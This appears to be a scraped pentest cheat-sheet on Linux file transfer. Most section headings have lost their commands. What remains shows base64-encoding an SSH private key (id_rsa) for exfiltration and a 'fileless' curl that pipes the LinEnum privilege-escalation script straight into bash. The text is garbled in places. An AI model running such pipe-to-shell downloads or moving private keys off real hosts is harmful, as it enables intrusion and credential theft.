Linux
BASE64
Check MD5 Hash
md5sum id_rsaEncode
cat id_rsa |base64 -w 0;echoDecode
echo -n 'justimaginethisissomerandomhashbecauseyoudontcareandidontcare=` | base64 -d > id_rsaCURL
Regular Download
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.shFileless Download
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bashMultiple File Upload
WGET
Regular Download
Fileless Download
Upload
Secure HTTPS Web Server
Alternative Methods
Creating a Web Server with Python3
Creating a Web Server with Python2.7
Creating a Web Server with PHP
Creating a Web Server with Ruby
Bash(/dev/tcp)
Connect to the Target Webserver
HTTP GET Request
Print the Response
SCP
Preparation
Enabling the SSH Server
Starting the SSH Server
Checking for SSH Listening Port
Download
Upload
Last updated